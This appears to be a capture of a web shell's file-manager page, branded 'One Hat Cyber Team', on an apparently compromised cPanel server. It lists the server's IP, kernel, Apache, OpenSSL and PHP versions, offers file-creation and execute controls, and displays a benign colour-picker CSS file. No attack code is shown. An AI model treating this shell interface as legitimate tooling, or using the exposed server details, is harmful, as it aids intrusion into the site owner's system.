⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.23
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Server Software:
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
id
/
public_html
/
public
/
assets
/
admin
/
css
/
View File Name :
choose-color.css
:root { --co-primaryColor: #1976D2; } .co-color-list { position: absolute; width: 312px; background: white; padding: 15px; z-index: 999; box-sizing: border-box; } .co-color-list::before { content: ""; position: absolute; border-left: 10px solid transparent; border-right: 10px solid transparent; } .co-color-list--bellow::before { top: -10px; border-bottom: 10px solid white; } .co-color-list--above::before { bottom: -10px; border-top: 10px solid white; } .co-color-list--left::before { left: 23px; } .co-color-list--right::before { right: 23px; } .co-color-list .color-pallet { margin: 0 0 15px; transition: all 450ms; padding: 0; } .co-color-list .color-pallet li { border: 1px solid rgba(0, 0, 0, 0.2); display: inline-block; cursor: pointer; width: 20px; height: 20px; } .co-color-list ul.color-reset { padding: 0; } .co-color-list ul.color-reset li { width: 100%; height: inherit; padding: 0; } .co-shadow-3dp { box-shadow: 0 1px 8px 0 rgba(0, 0, 0, .2), 0 3px 4px 0 rgba(0, 0, 0, .14), 0 3px 3px -2px rgba(0, 0, 0, .12); } .co-button-flat { height: 36px; line-height: 36px; padding: 0 16px; font-size: 14px; border-radius: 2px; color: var(--co-primaryColor); background: transparent; cursor: pointer; display: inline-block; transition: all 400ms; text-transform: uppercase; text-align: center; } .co-width-100-percentage { width: 100%; } .co-font-color-black-54 { color: rgba(0, 0, 0, .54); }